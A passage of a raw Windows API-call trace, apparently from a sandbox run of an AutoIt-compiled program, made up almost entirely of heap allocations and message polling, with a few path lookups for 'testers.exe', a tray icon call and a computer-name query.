wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a080 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794f0 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e00 [0261.164] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794f0 | out: hHeap=0xc60000) returned 1 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ef28 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794f0 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79508 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e10 [0261.164] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79508 | out: hHeap=0xc60000) returned 1 [0261.164] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e10 | out: hHeap=0xc60000) returned 1 [0261.164] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a0a8 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79508 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e10 [0261.165] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79508 | out: hHeap=0xc60000) returned 1 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ef60 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79508 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79520 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e20 [0261.165] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79520 | out: hHeap=0xc60000) returned 1 [0261.165] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e20 | out: hHeap=0xc60000) returned 1 [0261.165] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a0d0 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79520 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e20 [0261.165] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79520 | out: hHeap=0xc60000) returned 1 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xd03920 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79520 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79538 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e30 [0261.165] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79538 | out: hHeap=0xc60000) returned 1 [0261.165] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e30 | out: hHeap=0xc60000) returned 1 [0261.165] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a0f8 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79538 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e30 [0261.165] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79538 | out: hHeap=0xc60000) returned 1 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ef98 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79538 [0261.165] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79550 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e40 [0261.166] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79550 | out: hHeap=0xc60000) returned 1 [0261.166] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e40 | out: hHeap=0xc60000) returned 1 [0261.166] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a120 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79550 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e40 [0261.166] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79550 | out: hHeap=0xc60000) returned 1 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7efd0 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79550 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79568 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e50 [0261.166] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79568 | out: hHeap=0xc60000) returned 1 [0261.166] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e50 | out: hHeap=0xc60000) returned 1 [0261.166] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a148 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79568 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e50 [0261.166] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79568 | out: hHeap=0xc60000) returned 1 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7f008 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79568 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79580 [0261.166] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e60 [0261.166] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79580 | out: hHeap=0xc60000) returned 1 [0261.166] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e60 | out: hHeap=0xc60000) returned 1 [0261.166] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a170 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79580 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e60 [0261.167] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79580 | out: hHeap=0xc60000) returned 1 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9ae98 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79580 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79598 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e70 [0261.167] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79598 | out: hHeap=0xc60000) returned 1 [0261.167] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e70 | out: hHeap=0xc60000) returned 1 [0261.167] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a198 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79598 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e70 [0261.167] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79598 | out: hHeap=0xc60000) returned 1 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9aee0 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79598 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795b0 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e80 [0261.167] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795b0 | out: hHeap=0xc60000) returned 1 [0261.167] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e80 | out: hHeap=0xc60000) returned 1 [0261.167] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a1c0 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795b0 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e80 [0261.167] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795b0 | out: hHeap=0xc60000) returned 1 [0261.167] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9af28 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795b0 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795c8 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e90 [0261.168] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795c8 | out: hHeap=0xc60000) returned 1 [0261.168] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e90 | out: hHeap=0xc60000) returned 1 [0261.168] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a1e8 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795c8 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e90 [0261.168] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795c8 | out: hHeap=0xc60000) returned 1 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9af70 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795c8 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795e0 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75ea0 [0261.168] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795e0 | out: hHeap=0xc60000) returned 1 [0261.168] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75ea0 | out: hHeap=0xc60000) returned 1 [0261.168] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a210 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795e0 [0261.168] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75ea0 [0261.168] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795e0 | out: hHeap=0xc60000) returned 1 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7f040 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795e0 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795f8 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75eb0 [0261.169] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795f8 | out: hHeap=0xc60000) returned 1 [0261.169] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75eb0 | out: hHeap=0xc60000) returned 1 [0261.169] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a238 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795f8 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75eb0 [0261.169] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795f8 | out: hHeap=0xc60000) returned 1 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xce3728 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795f8 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79610 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75ec0 [0261.169] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79610 | out: hHeap=0xc60000) returned 1 [0261.169] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75ec0 | out: hHeap=0xc60000) returned 1 [0261.169] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a260 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79610 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75ec0 [0261.169] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79610 | out: hHeap=0xc60000) returned 1 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9afb8 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79610 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79628 [0261.169] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75ed0 [0261.169] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79628 | out: hHeap=0xc60000) returned 1 [0261.169] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75ed0 | out: hHeap=0xc60000) returned 1 [0261.170] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.170] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a288 [0261.170] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79628 [0261.175] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files", lpszShortPath=0x90f97c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1") returned 0x14 [0261.176] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpszShortPath=0x90f97c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1\\Desktop") returned 0x19 [0261.177] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)", lpszShortPath=0x90f97c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2") returned 0xb [0261.177] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpszShortPath=0x90f97c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x11 [0261.178] GetShortPathNameW (in: lpszLongPath="testers.exe", lpszShortPath=0x90f97c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x0 [0261.178] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe", lpszShortPath=0x90f97c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 0x20 [0261.879] Shell_NotifyIconW (dwMessage=0x1, lpData=0x91f3a0) returned 1 [0261.879] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca6018 | out: hHeap=0xc60000) returned 1 [0261.879] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1968 | out: hHeap=0xc60000) returned 1 [0261.879] KillTimer (hWnd=0x50172, uIDEvent=0x1) returned 1 [0261.880] SetTimer (hWnd=0x50172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0261.880] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0262.180] GetComputerNameW (in: lpBuffer=0x91f400, nSize=0x91f71c | out: lpBuffer="XDUWTFONO", nSize=0x91f71c) returned 1 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e050 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b78 [0262.181] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca6018 | out: hHeap=0xc60000) returned 1 [0262.181] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1938 | out: hHeap=0xc60000) returned 1 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1938 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7f388 [0262.181] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e050 | out: hHeap=0xc60000) returned 1 [0262.181] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0262.181] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a600 | out: hHeap=0xc60000) returned 1 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0262.181] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a600 | out: hHeap=0xc60000) returned 1 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xb0) returned 0xca2880 [0262.181] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f388 | out: hHeap=0xc60000) returned 1 [0262.181] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a600 | out: hHeap=0xc60000) returned 1 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0262.181] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a600 | out: hHeap=0xc60000) returned 1 [0262.181] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xccd2f8 | out: hHeap=0xc60000) returned 1 [0262.181] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18f8 | out: hHeap=0xc60000) returned 1 [0262.181] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18c8 | out: hHeap=0xc60000) returned 1 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e050 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca18c8 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79dd8 [0262.181] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a708 [0262.182] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79af0 | out: hHeap=0xc60000) returned 1 [0262.182] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca18f8 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e190 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79af0 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b78 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a660 [0262.182] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a678 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b78 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ad8 [0262.182] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6d8 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79b08 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b78 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b88 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e078 [0262.182] CharUpperBuffW (in: lpsz="AutoIt.Error", cchLength=0xc | out: lpsz="AUTOIT.ERROR") returned 0xc [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1978 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e1b8 [0262.182] CharUpperBuffW (in: lpsz="MyErrFunc", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0262.182] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e1b8 | out: hHeap=0xc60000) returned 1 [0262.182] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1978 | out: hHeap=0xc60000) returned 1 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7f388 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79b20 [0262.182] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d60 [0262.183] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e1b8 [0262.183] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79e08 [0262.183] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79bf8 [0262.183] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a648 [0262.183] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a618 [0262.183] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79bc8 [0262.183] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d78 [0262.183] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79be0 [0262.183] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a690 [0262.183] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9b048 [0262.183] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e1b8 | out: hHeap=0xc60000) returned 1 [0262.183] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6a8 [0262.183] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79b20 | out: hHeap=0xc60000) returned 1 [0262.183] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e1b8 [0262.184] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1978 [0262.184] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0262.184] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b88 | out: hHeap=0xc60000) returned 1 [0262.184] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79b08 | out: hHeap=0xc60000) returned 1 [0262.184] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0262.184] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6d8 | out: hHeap=0xc60000) returned 1 [0262.184] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6d8 [0262.184] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a660 | out: hHeap=0xc60000) returned 1 [0262.184] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79af0 | out: hHeap=0xc60000) returned 1 [0262.184] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ad8 | out: hHeap=0xc60000) returned 1 [0262.184] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a678 | out: hHeap=0xc60000) returned 1 [0262.184] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0262.184] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18f8 | out: hHeap=0xc60000) returned 1 [0262.184] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e190 [0262.184] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a678 [0262.184] 